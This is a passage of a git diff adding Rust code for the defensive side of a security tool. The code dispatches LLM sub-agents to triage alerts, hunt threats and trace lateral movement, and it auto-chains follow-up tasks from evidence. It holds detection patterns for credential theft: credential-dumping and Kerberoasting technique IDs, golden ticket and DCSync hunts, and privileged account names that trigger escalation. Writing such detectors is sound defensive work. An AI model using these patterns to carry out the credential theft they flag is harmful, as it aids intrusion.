format!("ares:blue:inv:{inv_id}:env_vars"); + let env_json = serde_json::to_string(&env_vars)?; + let _: () = conn.set(&env_key, &env_json).await?; + let _: () = conn.expire(&env_key, 3600).await?; + } + + // Push to investigation queue + let request_json = serde_json::to_string(&request)?; + let _: () = conn + .rpush("ares:blue:investigations", &request_json) + .await?; + + // Track investigation against operation + let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); + let _: () = conn.sadd(&op_inv_key, &inv_id).await?; + let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; + + Ok(inv_id) +} diff --git a/ares-cli/src/orchestrator/blue/callbacks.rs b/ares-cli/src/orchestrator/blue/callbacks.rs new file mode 100644 index 00000000..5020ae3a --- /dev/null +++ b/ares-cli/src/orchestrator/blue/callbacks.rs @@ -0,0 +1,621 @@ +//! Blue team callback handler for orchestrator dispatch and query tools. +//! +//! Implements `CallbackHandler` to handle: +//! - **Dispatch tools** — `dispatch_triage`, `dispatch_threat_hunt`, +//! `dispatch_lateral_analysis` run sub-agent loops inline and return results. +//! - **Query tools** — `get_investigation_status`, `get_task_result`, +//! `wait_for_all_tasks` read from Redis investigation state. +//! - **Completion callbacks** — `complete_investigation`, `escalate_investigation`, +//! `triage_complete`, etc. signal investigation lifecycle transitions. + +use std::sync::Arc; + +use anyhow::Result; +use tracing::{info, warn}; + +use ares_llm::agent_loop::CallbackResult; +use ares_llm::tool_registry::blue::{self, BlueAgentRole}; +use ares_llm::{ + run_agent_loop, AgentLoopConfig, CallbackHandler, LlmProvider, TokenUsage, ToolCall, + ToolDispatcher, +}; + +use super::sub_agent::{BlueToolDispatcher, SubAgentCallbackHandler}; + +/// All tool names this handler recognizes as callbacks. +pub(super) const BLUE_HANDLED_TOOLS: &[&str] = &[ + // Dispatch tools (run sub-agent loops) + "dispatch_triage", + "dispatch_threat_hunt", + "dispatch_lateral_analysis", + // Query tools + "get_investigation_status", + "get_task_result", + "wait_for_all_tasks", + // Completion/lifecycle callbacks + "triage_complete", + "hunt_complete", + "lateral_complete", + "complete_investigation", + "escalate_investigation", + "confirm_escalation", + "downgrade_escalation", + "request_reinvestigation", + "route_to_team", +]; + +/// Blue team callback handler for the orchestrator agent. +/// +/// Created per-investigation, holds references needed to run sub-agent loops +/// and query investigation state. +pub struct BlueCallbackHandler { + provider: Arc, + dispatcher: Arc, + model: String, + investigation_id: String, + alert: serde_json::Value, + redis_url: String, +} + +impl BlueCallbackHandler { + pub fn new( + provider: Arc, + dispatcher: Arc, + model: String, + investigation_id: String, + alert: serde_json::Value, + redis_url: String, + ) -> Self { + Self { + provider, + dispatcher, + model, + investigation_id, + alert, + redis_url, + } + } + + /// Run a sub-agent loop for a blue team role and return the result text. + async fn run_sub_agent(&self, role: BlueAgentRole, task_prompt: &str) -> Result { + let tools = blue::blue_tools_for_role(role); + let capabilities: Vec = tools + .iter() + .filter(|t| !blue::is_blue_callback_tool(&t.name)) + .map(|t| t.name.clone()) + .collect(); + + let system_prompt = + ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities)?; + + let config = AgentLoopConfig { + model: self.model.clone(), + max_steps: 50, + max_tool_calls_per_name: 25, + ..AgentLoopConfig::default() + }; + + // Wrap the dispatcher so blue tools (add_evidence, add_technique, etc.) + // are executed locally via dispatch_blue() instead of going through + // the red-team dispatcher which doesn't know about them. + let blue_dispatcher: Arc = Arc::new(BlueToolDispatcher { + inner: Arc::clone(&self.dispatcher), + }); + + let sub_agent_cb: Arc = Arc::new(SubAgentCallbackHandler { + investigation_id: self.investigation_id.clone(), + redis_url: self.redis_url.clone(), + }); + + let outcome = run_agent_loop( + self.provider.as_ref(), + blue_dispatcher, + &config, + &system_prompt, + task_prompt, + role.as_str(), + &self.investigation_id, + &tools, + Some(sub_agent_cb), + ) + .await; + + // Extract result text from the outcome + let result = match &outcome.reason { + ares_llm::LoopEndReason::TaskComplete { result, .. } => result.clone(), + ares_llm::LoopEndReason::EndTurn { content } => content.clone(), + ares_llm::LoopEndReason::RequestAssistance { issue, context } => { + format!("Sub-agent requested assistance: {issue}. Context: {context}") + } + ares_llm::LoopEndReason::MaxSteps => { + format!("Sub-agent hit max steps ({} steps)", outcome.steps) + } + ares_llm::LoopEndReason::MaxTokens => "Sub-agent hit max tokens".to_string(), + ares_llm::LoopEndReason::Error(e) => format!("Sub-agent error: {e}"), + }; + + Ok(result) + } + + /// Dispatch triage sub-agent. + async fn dispatch_triage(&self, _call: &ToolCall) -> Result { + info!( + investigation_id = %self.investigation_id, + "Dispatching triage sub-agent" + ); + + let alert_summary = serde_json::to_string_pretty(&self.alert).unwrap_or_default(); + let task_prompt = format!( + "You are triaging alert for investigation {}.\n\n\ + Alert data:\n{}\n\n\ + Analyze this alert. Determine severity, identify key indicators of compromise, \ + and recommend whether this needs deeper investigation. Use the available Loki \ + query tools to examine relevant logs around the alert timeframe.", + self.investigation_id, alert_summary + ); + + let result = self + .run_sub_agent(BlueAgentRole::Triage, &task_prompt) + .await?; + info!( + investigation_id = %self.investigation_id, + "Triage sub-agent completed" + ); + Ok(CallbackResult::Continue(format!( + "Triage result:\n{result}" + ))) + } + + /// Dispatch threat hunt sub-agent. + async fn dispatch_threat_hunt(&self, call: &ToolCall) -> Result { + let technique_id = call.arguments["technique_id"].as_str().unwrap_or("unknown"); + let detection_method = call.arguments["detection_method"] + .as_str() + .unwrap_or("log_analysis"); + let hostname = call.arguments["hostname"].as_str().unwrap_or(""); + let username = call.arguments["username"].as_str().unwrap_or(""); + let context = call.arguments["context"].as_str().unwrap_or(""); + + info!( + investigation_id = %self.investigation_id, + technique_id = technique_id, + "Dispatching threat hunt sub-agent" + ); + + let mut task_prompt = format!( + "You are hunting for MITRE ATT&CK technique {} in investigation {}.\n\ + Detection method: {}\n", + technique_id, self.investigation_id, detection_method + ); + if !hostname.is_empty() { + task_prompt.push_str(&format!("Target host: {hostname}\n")); + } + if !username.is_empty() { + task_prompt.push_str(&format!("Target user: {username}\n")); + } + if !context.is_empty() { + task_prompt.push_str(&format!("Context: {context}\n")); + } + task_prompt.push_str( + "\nUse the available Loki query tools to search for evidence of this technique. \ + Look for relevant log patterns, authentication events, process execution, \ + and lateral movement indicators.", + ); + + let result = self + .run_sub_agent(BlueAgentRole::ThreatHunter, &task_prompt) + .await?; + info!( + investigation_id = %self.investigation_id, + technique_id = technique_id, + "Threat hunt sub-agent completed" + ); + Ok(CallbackResult::Continue(format!( + "Threat hunt result ({technique_id}):\n{result}" + ))) + } + + /// Dispatch lateral analysis sub-agent. + async fn dispatch_lateral_analysis(&self, call: &ToolCall) -> Result { + let focus_host = call.arguments["focus_host"].as_str().unwrap_or("unknown"); + let focus_user = call.arguments["focus_user"].as_str().unwrap_or(""); + let context = call.arguments["context"].as_str().unwrap_or(""); + + info!( + investigation_id = %self.investigation_id, + focus_host = focus_host, + "Dispatching lateral analysis sub-agent" + ); + + let mut task_prompt = format!( + "You are analyzing lateral movement patterns in investigation {}.\n\ + Primary host: {}\n", + self.investigation_id, focus_host + ); + if !focus_user.is_empty() { + task_prompt.push_str(&format!("Primary user: {focus_user}\n")); + } + if !context.is_empty() { + task_prompt.push_str(&format!("Context: {context}\n")); + } + task_prompt.push_str( + "\nUse the available Loki query tools to trace authentication patterns, \ + SMB/WinRM/RDP connections, and credential usage across hosts. Map the \ + lateral movement path and identify compromised accounts.", + ); + + let result = self + .run_sub_agent(BlueAgentRole::LateralAnalyst, &task_prompt) + .await?; + info!( + investigation_id = %self.investigation_id, + focus_host = focus_host, + "Lateral analysis sub-agent completed" + ); + Ok(CallbackResult::Continue(format!( + "Lateral analysis result:\n{result}" + ))) + } + + /// Dispatch escalation triage sub-agent. + /// + /// Instead of immediately returning `RequestAssistance`, we launch an + /// `EscalationTriage` sub-agent that reviews the investigation context and + /// decides whether to confirm, downgrade, reinvestigate, or route. + async fn dispatch_escalation_triage(&self, call: &ToolCall) -> Result { + let reason = call.arguments["reason"].as_str().unwrap_or("unknown"); + let severity = call.arguments["severity"].as_str().unwrap_or("high"); + + info!( + investigation_id = %self.investigation_id, + severity = severity, + reason = reason, + "Dispatching escalation triage sub-agent" + ); + + let task_prompt = format!( + "You are performing escalation triage for investigation {}.\n\n\ + Escalation reason: {}\n\ + Severity: {}\n\n\ + Review the full investigation context using get_investigation_context. \ + Then make ONE of these decisions:\n\ + 1. confirm_escalation — if the evidence warrants human review\n\ + 2. downgrade_escalation — if this is a false positive or low severity\n\ + 3. request_reinvestigation — if more evidence is needed before deciding\n\ + 4. route_to_team — if a specialist team should handle this\n\n\ + Be decisive. Evaluate the evidence quality, technique severity, and \ + scope of compromise before making your decision.", + self.investigation_id, reason, severity + ); + + let result = self + .run_sub_agent(BlueAgentRole::EscalationTriage, &task_prompt) + .await?; + + info!( + investigation_id = %self.investigation_id, + "Escalation triage sub-agent completed" + ); + + // If the triage confirmed escalation, propagate as RequestAssistance + // so the orchestrator loop terminates with escalated status. + // Otherwise return the triage decision as a Continue so the orchestrator + // can incorporate the finding (e.g., downgrade → complete investigation). + let lower = result.to_lowercase(); + if lower.contains("escalation confirmed") || lower.contains("confirm") { + Ok(CallbackResult::RequestAssistance { + issue: format!("Escalation confirmed by triage ({severity}): {reason}"), + context: result, + }) + } else { + Ok(CallbackResult::Continue(format!( + "Escalation triage result:\n{result}" + ))) + } + } + + /// Handle query tools that read investigation state from Redis. + async fn handle_query_tool(&self, call: &ToolCall) -> Result { + match call.name.as_str() { + "get_investigation_status" => { + let reader = ares_core::state::BlueStateReader::new(self.investigation_id.clone()); + let mut conn = redis::Client::open(self.redis_url.as_str())? + .get_connection_manager() + .await?; + match reader.load_state(&mut conn).await? { + Some(state) => { + let mut summary = format!( + "Investigation: {}\nStage: {:?}\n", + self.investigation_id, state.stage + ); + if !state.evidence.is_empty() { + summary + .push_str(&format!("Evidence items: {}\n", state.evidence.len())); + for (i, ev) in state.evidence.iter().enumerate().take(10) { + summary.push_str(&format!( + " {}. [{}] {}\n", + i + 1, + ev.evidence_type, + ev.value + )); + } + } + if !state.timeline.is_empty() { + summary + .push_str(&format!("Timeline events: {}\n", state.timeline.len())); + } + Ok(CallbackResult::Continue(summary)) + } + None => Ok(CallbackResult::Continue( + "Investigation state not yet initialized.".to_string(), + )), + } + } + "get_task_result" => { + let task_id = call.arguments["task_id"].as_str().unwrap_or("unknown"); + Ok(CallbackResult::Continue(format!( + "Task {task_id} result lookup not yet implemented — \ + sub-agent results are returned inline from dispatch tools." + ))) + } + "wait_for_all_tasks" => { + // In the inline dispatch model, tasks complete synchronously + Ok(CallbackResult::Continue( + "All dispatched tasks have completed (inline execution).".to_string(), + )) + } + _ => Ok(CallbackResult::Continue(format!( + "Unknown query tool: {}", + call.name + ))), + } + } + + /// Handle completion/lifecycle callbacks. + pub(super) fn handle_lifecycle_callback(call: &ToolCall) -> Option { + match call.name.as_str() { + "triage_complete" => { + let severity = call.arguments["severity"].as_str().unwrap_or("unknown"); + let summary = call.arguments["summary"].as_str().unwrap_or(""); + let escalate = call.arguments["escalate"].as_bool().unwrap_or(false); + let result = + format!("Triage complete: severity={severity}, escalate={escalate}. {summary}"); + Some(CallbackResult::TaskComplete { + task_id: "triage".into(), + result, + }) + } + "hunt_complete" => { + let findings = call.arguments["findings"].as_str().unwrap_or(""); + let confidence = call.arguments["confidence"].as_str().unwrap_or("medium"); + let result = format!("Hunt complete (confidence: {confidence}): {findings}"); + Some(CallbackResult::TaskComplete { + task_id: "threat_hunt".into(), + result, + }) + } + "lateral_complete" => { + let connections = call.arguments["connections_found"].as_u64().unwrap_or(0); + let summary = call.arguments["summary"].as_str().unwrap_or(""); + let result = + format!("Lateral analysis: {connections} connections found. {summary}"); + Some(CallbackResult::TaskComplete { + task_id: "lateral_analysis".into(), + result, + }) + } + "complete_investigation" => { + let summary = call.arguments["summary"].as_str().unwrap_or(""); + let result = format!("Investigation complete. {summary}"); + Some(CallbackResult::TaskComplete { + task_id: "investigation".into(), + result: result.to_string(), + }) + } + // escalate_investigation is handled async in dispatch_escalation_triage + "confirm_escalation" => { + let action = call.arguments["action"].as_str().unwrap_or("escalate"); + Some(CallbackResult::TaskComplete { + task_id: "escalation_triage".into(), + result: format!("Escalation confirmed: {action}"), + }) + } + "downgrade_escalation" => { + let reason = call.arguments["reason"].as_str().unwrap_or(""); + Some(CallbackResult::TaskComplete { + task_id: "escalation_triage".into(), + result: format!("Escalation downgraded: {reason}"), + }) + } + "request_reinvestigation" => { + let focus = call.arguments["focus"].as_str().unwrap_or(""); + Some(CallbackResult::Continue(format!( + "Reinvestigation queued with focus: {focus}" + ))) + } + "route_to_team" => { + let team = call.arguments["team"].as_str().unwrap_or("soc"); + let priority = call.arguments["priority"].as_str().unwrap_or("medium"); + Some(CallbackResult::TaskComplete { + task_id: "routing".into(), + result: format!("Routed to {team} team (priority: {priority})"), + }) + } + _ => None, + } + } +} + +#[async_trait::async_trait] +impl CallbackHandler for BlueCallbackHandler { + fn is_callback(&self, tool_name: &str) -> bool { + BLUE_HANDLED_TOOLS.contains(&tool_name) + } + + async fn handle_callback(&self, call: &ToolCall) -> Option> { + match call.name.as_str() { + // Dispatch tools — run sub-agent loops + "dispatch_triage" => Some(self.dispatch_triage(call).await), + "dispatch_threat_hunt" => Some(self.dispatch_threat_hunt(call).await), + "dispatch_lateral_analysis" => Some(self.dispatch_lateral_analysis(call).await), + + // Escalation — launches escalation triage sub-agent + "escalate_investigation" => Some(self.dispatch_escalation_triage(call).await), + + // Query tools + "get_investigation_status" | "get_task_result" | "wait_for_all_tasks" => { + Some(self.handle_query_tool(call).await) + } + + // Lifecycle callbacks + _ => Self::handle_lifecycle_callback(call).map(Ok), + } + } + + async fn on_token_usage(&self, usage: &TokenUsage, model: &str) { + if usage.input_tokens == 0 && usage.output_tokens == 0 { + return; + } + if let Ok(client) = redis::Client::open(self.redis_url.as_str()) { + if let Ok(mut conn) = client.get_connection_manager().await { + if let Err(e) = ares_core::token_usage::increment_blue_token_usage( + &mut conn, + &self.investigation_id, + usage.input_tokens.into(), + usage.output_tokens.into(), + model, + ) + .await + { + warn!(err = %e, "Failed to record blue token usage"); + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + #[test] + fn test_is_callback() { + let handler = BlueCallbackHandler { + provider: Arc::new(MockProvider), + dispatcher: Arc::new(MockDispatcher), + model: "test".into(), + investigation_id: "inv-test".into(), + alert: json!({}), + redis_url: "redis://localhost".into(), + }; + + assert!(handler.is_callback("dispatch_triage")); + assert!(handler.is_callback("dispatch_threat_hunt")); + assert!(handler.is_callback("dispatch_lateral_analysis")); + assert!(handler.is_callback("complete_investigation")); + assert!(handler.is_callback("escalate_investigation")); + assert!(handler.is_callback("get_investigation_status")); + assert!(!handler.is_callback("nmap_scan")); + assert!(!handler.is_callback("query_loki_logs")); + } + + #[test] + fn test_triage_complete_callback() { + let call = ToolCall { + id: "c1".into(), + name: "triage_complete".into(), + arguments: json!({ + "severity": "high", + "summary": "Kerberoasting detected", + "escalate": true, + }), + }; + let result = BlueCallbackHandler::handle_lifecycle_callback(&call).unwrap(); + match result { + CallbackResult::TaskComplete { result, .. } => { + assert!(result.contains("high")); + assert!(result.contains("escalate=true")); + } + _ => panic!("Expected TaskComplete"), + } + } + + #[test] + fn test_escalate_investigation_not_in_lifecycle_callbacks() { + // escalate_investigation is now handled async via dispatch_escalation_triage, + // not the static handle_lifecycle_callback + let call = ToolCall { + id: "c2".into(), + name: "escalate_investigation".into(), + arguments: json!({ + "reason": "Active lateral movement detected", + "severity": "critical", + }), + }; + assert!(BlueCallbackHandler::handle_lifecycle_callback(&call).is_none()); + } + + #[test] + fn test_complete_investigation_callback() { + let call = ToolCall { + id: "c3".into(), + name: "complete_investigation".into(), + arguments: json!({ + "summary": "True positive: credential theft confirmed", + }), + }; + let result = BlueCallbackHandler::handle_lifecycle_callback(&call).unwrap(); + match result { + CallbackResult::TaskComplete { result, .. } => { + assert!(result.contains("credential theft")); + } + _ => panic!("Expected TaskComplete"), + } + } + + #[test] + fn test_unknown_callback() { + let call = ToolCall { + id: "c4".into(), + name: "nmap_scan".into(), + arguments: json!({}), + }; + assert!(BlueCallbackHandler::handle_lifecycle_callback(&call).is_none()); + } + + // Minimal mock types for tests + struct MockProvider; + + #[async_trait::async_trait] + impl LlmProvider for MockProvider { + async fn chat( + &self, + _request: &ares_llm::provider::LlmRequest, + ) -> std::result::Result + { + unimplemented!("Mock provider") + } + fn name(&self) -> &str { + "mock" + } + } + + struct MockDispatcher; + + #[async_trait::async_trait] + impl ToolDispatcher for MockDispatcher { + async fn dispatch_tool( + &self, + _role: &str, + _task_id: &str, + _call: &ToolCall, + ) -> anyhow::Result { + Ok(ares_llm::ToolExecResult { + output: "mock result".to_string(), + error: None, + discoveries: None, + }) + } + } +} diff --git a/ares-cli/src/orchestrator/blue/chaining.rs b/ares-cli/src/orchestrator/blue/chaining.rs new file mode 100644 index 00000000..98138642 --- /dev/null +++ b/ares-cli/src/orchestrator/blue/chaining.rs @@ -0,0 +1,598 @@ +//! Evidence auto-chaining for blue team investigations. +//! +//! When a task result contains evidence of certain types, this module +//! automatically spawns follow-up investigation tasks. This mirrors +//! the Python `EVIDENCE_CHAIN_MAP` / `_process_result_chains` logic +//! in `result_processing.py`. + +use std::collections::{HashMap, HashSet}; +use std::sync::LazyLock; + +use anyhow::Result; +use chrono::Utc; +use serde_json::Value; +use tracing::{debug, info}; + +use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult}; +use ares_llm::tool_registry::blue::BlueAgentRole; + +// ── Static configuration ─────────────────────────────────────────── + +/// Follow-up action descriptor produced by evidence chaining. +#[derive(Debug, Clone)] +struct ChainAction { + /// Task type to dispatch (e.g. `"threat_hunt"`, `"lateral_analysis"`). + task_type: &'static str, + /// Worker role that handles this task type. + role: BlueAgentRole, + /// Human-readable description embedded in the task params. + focus: &'static str, +} + +/// Evidence type to follow-up actions mapping. +/// +/// When a task result contains an evidence type key, the corresponding +/// actions are dispatched as follow-up sub-tasks (subject to dedup). +static EVIDENCE_CHAIN_MAP: LazyLock>> = + LazyLock::new(|| { + let mut m = HashMap::new(); + + m.insert( + "suspicious_ip", + vec![ChainAction { + task_type: "threat_hunt", + role: BlueAgentRole::ThreatHunter, + focus: "IP correlation analysis", + }], + ); + + m.insert( + "malicious_process", + vec![ChainAction { + task_type: "threat_hunt", + role: BlueAgentRole::ThreatHunter, + focus: "process ancestry and execution chain analysis", + }], + ); + + m.insert( + "lateral_movement", + vec![ChainAction { + task_type: "lateral_analysis", + role: BlueAgentRole::LateralAnalyst, + focus: "lateral movement path reconstruction", + }], + ); + + m.insert( + "credential_access", + vec![ChainAction { + task_type: "threat_hunt", + role: BlueAgentRole::ThreatHunter, + focus: "credential abuse pattern detection", + }], + ); + + m.insert( + "persistence_mechanism", + vec![ChainAction { + task_type: "threat_hunt", + role: BlueAgentRole::ThreatHunter, + focus: "persistence indicator sweep", + }], + ); + + m.insert( + "c2_communication", + vec![ChainAction { + task_type: "threat_hunt", + role: BlueAgentRole::ThreatHunter, + focus: "network IOC and C2 beacon analysis", + }], + ); + + m.insert( + "privilege_escalation", + vec![ + ChainAction { + task_type: "lateral_analysis", + role: BlueAgentRole::LateralAnalyst, + focus: "post-escalation lateral movement assessment", + }, + ChainAction { + task_type: "threat_hunt", + role: BlueAgentRole::ThreatHunter, + focus: "privilege escalation technique detection", + }, + ], + ); + + m + }); + +/// Users whose appearance in results triggers automatic escalation. +static CRITICAL_USERS: LazyLock> = LazyLock::new(|| { + let mut s = HashSet::new(); + s.insert("krbtgt"); + s.insert("administrator"); + s.insert("domain admins"); + s.insert("enterprise admins"); + s.insert("schema admins"); + s +}); + +// ── Public API ───────────────────────────────────────────────────── + +/// Process a completed task result and dispatch any follow-up tasks +/// dictated by the evidence chain map. +/// +/// Returns the list of newly dispatched task IDs (may be empty). +/// +/// `dispatched_chains` is the per-investigation dedup set: each entry +/// is `"{evidence_type}:{task_type}"`. The caller must persist this +/// set across calls for the same investigation. +pub async fn process_task_result( + result: &BlueTaskResult, + task_queue: &mut BlueTaskQueue, + investigation_id: &str, + dispatched_chains: &mut HashSet, +) -> Result> { + let payload = match (&result.success, &result.result) { + (true, Some(val)) => val, + _ => return Ok(Vec::new()), + }; + + let mut new_task_ids = Vec::new(); + + // 1. Extract evidence types from the result payload. + let evidence_types = extract_evidence_types(payload); + + for ev_type in &evidence_types { + if let Some(actions) = EVIDENCE_CHAIN_MAP.get(ev_type.as_str()) { + for action in actions { + let dedup_key = format!("{ev_type}:{}", action.task_type); + if dispatched_chains.contains(&dedup_key) { + debug!( + investigation_id, + evidence_type = ev_type.as_str(), + task_type = action.task_type, + "Skipping duplicate chain dispatch" + ); + continue; + } + + let task_id = + dispatch_chain_task(task_queue, investigation_id, action, ev_type).await?; + + dispatched_chains.insert(dedup_key); + new_task_ids.push(task_id); + } + } + } + + // 2. Check for critical user escalation. + if let Some(reason) = should_escalate(result) { + let escalation_dedup = "escalation:critical_user".to_string(); + if !dispatched_chains.contains(&escalation_dedup) { + info!( + investigation_id, + reason = reason.as_str(), + "Auto-escalating: critical user detected" + ); + + // Dispatch both golden ticket detection and DCSync detection. + for (task_type, focus) in [ + ( + "threat_hunt", + "golden ticket detection for critical user activity", + ), + ("threat_hunt", "DCSync detection for critical user activity"), + ] { + let sub_dedup = format!("escalation:{task_type}:{focus}"); + if dispatched_chains.contains(&sub_dedup) { + continue; + } + + let action = ChainAction { + task_type, + role: BlueAgentRole::ThreatHunter, + focus, + }; + let task_id = + dispatch_chain_task(task_queue, investigation_id, &action, "critical_user") + .await?; + dispatched_chains.insert(sub_dedup); + new_task_ids.push(task_id); + } + + dispatched_chains.insert(escalation_dedup); + } + } + + if !new_task_ids.is_empty() { + info!( + investigation_id, + count = new_task_ids.len(), + task_ids = ?new_task_ids, + "Auto-chained follow-up tasks" + ); + } + + Ok(new_task_ids) +} + +/// Check whether a task result warrants automatic escalation. +/// +/// Returns `Some(reason)` if escalation is warranted, `None` otherwise. +pub fn should_escalate(result: &BlueTaskResult) -> Option { + let payload = result.result.as_ref()?; + + // Check users_investigated array for critical user names. + if let Some(users) = payload.get("users_investigated").and_then(|v| v.as_array()) { + for user in users { + if let Some(name) = user.as_str() { + let lower = name.to_lowercase(); + let trimmed = lower.trim(); + if CRITICAL_USERS.contains(trimmed) { + return Some(format!("Critical user detected: {name}")); + } + } + } + } + + // Check evidence_highlights for critical user mentions. + if let Some(highlights) = payload + .get("evidence_highlights") + .and_then(|v| v.as_array()) + { + for highlight in highlights { + if let Some(text) = highlight.as_str() { + let lower = text.to_lowercase(); + for &critical in CRITICAL_USERS.iter() { + if lower.contains(critical) { + return Some(format!("Critical user '{critical}' mentioned in evidence")); + } + } + } + } + } + + // Check for high-severity indicators in the result. + if let Some(severity) = payload.get("severity").and_then(|v| v.as_str()) { + let sev_lower = severity.to_lowercase(); + if sev_lower == "critical" || sev_lower == "high" { + return Some(format!("High severity result: {severity}")); + } + } + + // Check findings text for critical user mentions. + if let Some(findings) = payload.get("findings").and_then(|v| v.as_str()) { + let lower = findings.to_lowercase(); + for &critical in CRITICAL_USERS.iter() { + if lower.contains(critical) { + return Some(format!("Critical user '{critical}' mentioned in findings")); + } + } + } + + None +} + +// ── Internals ────────────────────────────────────────────────────── + +/// Extract evidence type strings from a result payload. +/// +/// Looks for: +/// - `evidence_types`: `["suspicious_ip", ...]` +/// - `evidence`: `[{ "type": "suspicious_ip", ... }, ...]` +/// - `techniques_found`: maps MITRE technique IDs to evidence types +fn extract_evidence_types(payload: &Value) -> Vec { + let mut types = Vec::new(); + + // Direct evidence_types array + if let Some(arr) = payload.get("evidence_types").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + types.push(s.to_lowercase()); + } + } + } + + // Evidence objects with a "type" field + if let Some(arr) = payload.get("evidence").and_then(|v| v.as_array()) { + for item in arr { + if let Some(ev_type) = item.get("type").and_then(|v| v.as_str()) { + types.push(ev_type.to_lowercase()); + } + } + } + + // MITRE technique mapping (mirrors Python _process_result_chains) + if let Some(arr) = payload.get("techniques_found").and_then(|v| v.as_array()) { + for tech in arr { + if let Some(tech_str) = tech.as_str() { + let lower = tech_str.to_lowercase(); + if lower.contains("t1558") { + // Kerberoasting -> credential_access + types.push("credential_access".to_string()); + } else if lower.contains("t1003") { + // OS Credential Dumping -> credential_access + types.push("credential_access".to_string()); + } else if lower.contains("t1550") { + // Use Alternate Authentication Material -> lateral_movement + types.push("lateral_movement".to_string()); + } else if lower.contains("t1021") { + // Remote Services -> lateral_movement + types.push("lateral_movement".to_string()); + } else if lower.contains("t1053") || lower.contains("t1547") { + // Scheduled Task / Boot Autostart -> persistence_mechanism + types.push("persistence_mechanism".to_string()); + } else if lower.contains("t1071") || lower.contains("t1105") { + // Application Layer Protocol / Ingress Tool Transfer -> c2 + types.push("c2_communication".to_string()); + } else if lower.contains("t1068") || lower.contains("t1134") { + // Exploitation for Privilege Escalation / Access Token Manipulation + types.push("privilege_escalation".to_string()); + } + } + } + } + + // Dedup while preserving order + let mut seen = HashSet::new(); + types.retain(|t| seen.insert(t.clone())); + + types +} + +/// Dispatch a single chained follow-up task to the blue task queue. +async fn dispatch_chain_task( + task_queue: &mut BlueTaskQueue, + investigation_id: &str, + action: &ChainAction, + evidence_type: &str, +) -> Result { + let task_id = format!( + "chain_{}_{}_{}_{}", + action.task_type, + evidence_type, + &investigation_id.chars().take(8).collect::(), + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + + let params = serde_json::json!({ + "chained_from_evidence": evidence_type, + "focus": action.focus, + "auto_chained": true, + }); + + let task = BlueTaskMessage { + task_id: task_id.clone(), + investigation_id: investigation_id.to_string(), + task_type: action.task_type.to_string(), + role: action.role.as_str().to_string(), + params, + created_at: Utc::now().to_rfc3339(), + }; + + task_queue.submit_task(&task).await?; + + info!( + task_id = %task_id, + task_type = action.task_type, + evidence_type, + focus = action.focus, + investigation_id, + "Dispatched chained follow-up task" + ); + + Ok(task_id) +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + #[test] + fn test_extract_evidence_types_from_evidence_types_array() { + let payload = json!({ + "evidence_types": ["suspicious_ip", "lateral_movement"] + }); + let types = extract_evidence_types(&payload); + assert_eq!(types, vec!["suspicious_ip", "lateral_movement"]); + } + + #[test] + fn test_extract_evidence_types_from_evidence_objects() { + let payload = json!({ + "evidence": [ + { "type": "Credential_Access", "value": "hash123" }, + { "type": "c2_communication", "value": "beacon" } + ] + }); + let types = extract_evidence_types(&payload); + assert_eq!(types, vec!["credential_access", "c2_communication"]); + } + + #[test] + fn test_extract_evidence_types_from_techniques() { + let payload = json!({ + "techniques_found": ["T1558.003", "T1021.002"] + }); + let types = extract_evidence_types(&payload); + assert_eq!(types, vec!["credential_access", "lateral_movement"]); + } + + #[test] + fn test_extract_evidence_types_dedup() { + let payload = json!({ + "evidence_types": ["lateral_movement"], + "techniques_found": ["T1550.002"] + }); + let types = extract_evidence_types(&payload); + // "lateral_movement" appears from both sources but should only be listed once + assert_eq!(types, vec!["lateral_movement"]); + } + + #[test] + fn test_should_escalate_critical_user_in_users_investigated() { + let result = BlueTaskResult { + task_id: "t1".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "users_investigated": ["krbtgt", "normaluser"] + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("krbtgt")); + } + + #[test] + fn test_should_escalate_critical_user_in_highlights() { + let result = BlueTaskResult { + task_id: "t2".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "evidence_highlights": ["Found Administrator logon from unusual host"] + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("administrator")); + } + + #[test] + fn test_should_escalate_high_severity() { + let result = BlueTaskResult { + task_id: "t3".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "severity": "critical", + "summary": "Active data exfiltration" + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("critical")); + } + + #[test] + fn test_should_escalate_schema_admins() { + let result = BlueTaskResult { + task_id: "t4".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "users_investigated": ["Schema Admins"] + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("Schema Admins")); + } + + #[test] + fn test_should_not_escalate_normal_result() { + let result = BlueTaskResult { + task_id: "t5".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "users_investigated": ["svc_backup", "jsmith"], + "severity": "low" + })), + error: None, + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + assert!(should_escalate(&result).is_none()); + } + + #[test] + fn test_should_not_escalate_failed_result() { + let result = BlueTaskResult { + task_id: "t6".into(), + investigation_id: "inv1".into(), + success: false, + result: None, + error: Some("timeout".into()), + completed_at: "2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + assert!(should_escalate(&result).is_none()); + } + + #[test] + fn test_should_escalate_findings_mention() { + let result = BlueTaskResult { + task_id: "t7".into(), + investigation_id: "inv1".into(), + success: true, + result: Some(json!({ + "findings": "Enterprise Admins group membership was modified" + })), + error: None, + completed_at: 